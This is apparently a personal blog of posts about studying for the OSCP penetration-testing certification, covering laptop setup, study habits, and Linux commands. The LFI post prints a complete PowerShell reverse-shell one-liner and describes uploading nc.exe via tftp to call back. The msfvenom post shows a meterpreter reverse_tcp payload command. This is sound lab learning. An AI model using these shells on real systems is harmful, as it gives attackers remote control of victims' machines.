RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today: I woke up at 3:30 am to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion (LFI) attacks. I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

Sláinte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of the things they say in the exercise is a Lincoln quote – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.

I love meditation 👁️❤️🧘

Merry Christmas interwebs! Well, one day late, but still – and keep in mind that is the Catholic Christmas, not the Orthodox Christmas, which we will celebrate with my wife’s family on January 7th, 2019. So merry in-between Christmas???

There are a few things I love, and meditation is one of them. I can’t highlight how amazing it is – and with apps like Headspace, you really can’t go wrong. There is so much importance in the need for us to appreciate the present. I think when we train our minds on being present and aware, we appreciate life and the people around us. I am currently working through headspace on their Kindness pack but there are so many different types of packs, from mindful eating to taking a walk in the park.

I am on day 11 of my OSCP and the more I read about the test, and what it involves, the more I realize that 90 days may get me to where I need, but I have to study. So my goal is 3 hours/day weekdays, 6-8 hours/day weekends. I think if I just invest the time and energy, it’s possible. The OSCP is becoming the de-facto standard in Pen Testing, and I really want to get it. It would be such a confidence lifter for me.

Happy Wednesday, and press on.

Finally landed on the Surface Laptop 2

Well, the Matebook X Pro didn’t fare well with a dual boot of Kali and Windows. I think it had something to do with the weird 3000×2000 resolution and the fact that grub couldn’t understand that to boot into an installer for Kali. I tried working on different grub commands, but eh, I did so much that I couldn’t get the machine to boot back into the original install.

So I took it back to the store and decided VM only – no dual booting. I mean, OSCP is set up to work within a VM, all my practice books are with VMs. So VM it is – and I need a good supported VM app, so Windows with VMWare Workstation was the way to go. I also wanted a laptop that will last, so I put up the extra cash for the new Surface Laptop 2. I am happy so far. I do wish it had USB-C as the MXP did, but it wasn’t a deal breaker. Back to studying!

Happy Monday!

Currently listening to Desi, waiting for my new USB stick to finish a slow format. So I have been using my wife’s computer to start prepping for the OSCP, and I have to say, that was a bad idea. I have a mac, but trying to create my own virtual lab in there has been rough. I used VirtualBox to do this, but VMWare Workstation on a Windows machine just seems to get the job done right.

So, my first thought was to go with a souped-up Chromebook. I went ahead and got the i7 Pixelbook. Nice looking machine, and yes, I think ChromeOS is nice – but I wanted to run Linux off of it. So I went two different routes on this, and neither worked like I needed it to.

Route 1: I changed my channel to the developer channel and just used the crostini linux that google offered from this channel. It wasn’t a full blown linux like I needed. So scratch that.

Route 2: I put the Pixelbook in developer mode, and ran chroots of linux. After some crazy finagling, I got kali-rolling on an xfce desktop. But, still limited – for example, I couldn’t do any networking – this was just a virtual container running on ChromeOS.

I didn’t try wiping the OS and just installing a linux on metal. Mainly because I was afraid that doing that would lock me into not being able to return the machine. After not being able to successfully do either of the above routes, I put the machine back on the stable channel, main mode, and powerwash.

I haven’t gotten my $ back (it’s still in the mail), but I need a machine that is not my wife’s. Some googling commenced, and I settled on a Matebook X Pro (MXP). I think it’s the best bang for your buck. I almost bought a Surface Book 2, but it was clunky, and $1K more. I don’t really need a 2-in-1. The only thing about the MXP is the resolution is a bit wack. It works, but it’s like 3000×2000 – and then you have to increase the font size. So far, ok, but some of my older VMs (Windows 7, XP, Ubuntu) are hard to see/really small. But the ports, the size, and the power of the computer I really like. I am a bit concerned about the build – Chinese products sometimes don’t last as long, and I am hoping this will take me 5 years out. But I hope that I am done with my OSCP at that time, and it might be time for a new PC, based on what I learned.

I am going to set up a dual boot on Kali and Windows. The drive is a 512MB SSD and so far, all is well, except for the heat – the computer does come with a 1 year warranty, so I am going to lean on that if something doesn’t go well.

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.49 LPORT=12345 -f exe > chapter4example.exe

…That’s not working either. The output I am getting is:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload

No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

I think I am going to keep on going….. and it looks like the multi/handler module isn’t working either. I’ll come back to this as well.

Data Manipulation and Netcat

Just got done with chapter 2. Yeah, 17 days later. Oh well…

The 2nd chapter for me was a bit of a regurgitation of basic Linux commands, other than a few Data Manipulation commands:

  • sed – this command is ideal for editing files based on certain patterns or expressions
  • awk – another pattern matching tool, but more robust
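As an added example (not from the book or the post), here is sed and awk doing the kind of pattern-based work the chapter covers, on a few constructed sshd log lines: awk counts failed logins per source address, and sed redacts the last octet of every IPv4 address before the log is shared. The addresses are documentation ranges, not real hosts.

```shell
#!/bin/sh
# Constructed sample auth-log lines (not real data) to exercise sed and awk.
SAMPLE_LOG='Mar 17 03:31:02 lab sshd[1201]: Failed password for root from 203.0.113.5 port 51234 ssh2
Mar 17 03:31:04 lab sshd[1201]: Failed password for root from 203.0.113.5 port 51236 ssh2
Mar 17 03:31:09 lab sshd[1203]: Accepted password for student from 198.51.100.7 port 40022 ssh2
Mar 17 03:31:15 lab sshd[1205]: Failed password for invalid user admin from 203.0.113.5 port 51240 ssh2
Mar 17 03:32:01 lab sshd[1207]: Failed password for student from 198.51.100.7 port 40030 ssh2'

# awk: count failed logins per source IP, highest count first.
# The IP always follows the word "from", so locate that field instead of
# assuming a fixed column (the "invalid user" form shifts the columns).
failed_logins_by_ip() {
    printf '%s\n' "$SAMPLE_LOG" |
    awk '/Failed password/ {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            count[ip]++
         }
         END { for (ip in count) print count[ip], ip }' |
    sort -rn
}

# sed: replace the last octet of every IPv4 address with "xxx".
redact_ips() {
    printf '%s\n' "$SAMPLE_LOG" |
    sed -E 's/([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.[0-9]{1,3}/\1.xxx/g'
}

failed_logins_by_ip
redact_ips
```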

…and the book talks about Netcat. Now we are working with networking.

Glad to back on the train.

dhclient and restarting smbd

When I installed Kali 2018.2, after bridging the network in VMWare, I wasn’t able to get to the network. Through a Kali udemy course, I learned two commands that have been working for me in not only Kali, but other Linux machines to get an ip address and bridge the connection. In Kali, you are root, so I didn’t need sudo. If you are using a different user, you will need to sudo to run the commands (with the exception of ifconfig):

  • ifconfig

With ifconfig, look to see what your interface is (eth0, eth1). Mine is eth0 in Kali, so I will use that for the next command.

  • dhclient eth0

DHCP Client, dhclient, provides a means for configuring one or more network interfaces using the Dynamic Host Configuration Protocol, BOOTP protocol, or if these protocols fail, by statically assigning an address.

  • service smbd restart

smbd is the server daemon that provides filesharing and printing services to Windows clients. The server provides filespace and printer services to clients using the SMB (or CIFS) protocol. This is compatible with the LanManager protocol, and can service LanManager clients. These include MSCLIENT 3.0 for DOS, Windows for Workgroups, Windows 95/98/ME, Windows NT, Windows 2000, OS/2, DAVE for Macintosh, and smbfs for Linux.

Now try pinging google:

  • ping 8.8.8.8

You should be connected now.  Whoo!
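The same ifconfig → dhclient → ping sequence as a small script with checks at each step, added here as an example and not from the course or the post. It assumes a Debian-style Kali VM with ifconfig, dhclient and ping installed and is run as root; the smbd restart is left out because Samba is a file-sharing service and plays no part in obtaining an address.

```shell
#!/bin/sh
# Pick the first non-loopback interface from ifconfig output on stdin.
# Interface names start in column 1, as "eth0: flags=..." (new style)
# or "eth0      Link encap:..." (old style); "lo" is skipped.
first_interface() {
    awk '/^[a-zA-Z0-9]+[: ]/ { sub(/:$/, "", $1); if ($1 != "lo") { print $1; exit } }'
}

# Succeed once the given interface has an IPv4 address, matching both
# "inet 10.0.1.49" and the older "inet addr:10.0.1.49" ifconfig layouts.
has_ipv4() {
    ifconfig "$1" 2>/dev/null | grep -Eq 'inet (addr:)?[0-9]'
}

# Constructed ifconfig output (not captured from a real host) so the
# interface detection can be exercised without touching the network.
SAMPLE_IFCONFIG='lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 00:0c:29:aa:bb:cc  txqueuelen 1000'

# Full sequence: find the interface, lease an address only if it has none,
# then use the post's 8.8.8.8 ping as the reachability check.
bring_up() {
    iface=$(ifconfig -a | first_interface)
    [ -n "$iface" ] || { echo "no non-loopback interface found" >&2; return 1; }
    if has_ipv4 "$iface"; then
        echo "$iface already has an address, skipping dhclient"
    else
        dhclient "$iface" || { echo "dhclient failed on $iface" >&2; return 1; }
    fi
    if ping -c 1 -W 2 8.8.8.8 >/dev/null 2>&1; then
        echo "$iface is up and routed"
    else
        echo "$iface has a lease but no route out" >&2
        return 1
    fi
}

# Show interface detection on the constructed sample (prints "eth0").
printf '%s\n' "$SAMPLE_IFCONFIG" | first_interface
```

Run `bring_up` on the VM itself once the interface detection looks right; it needs root for dhclient.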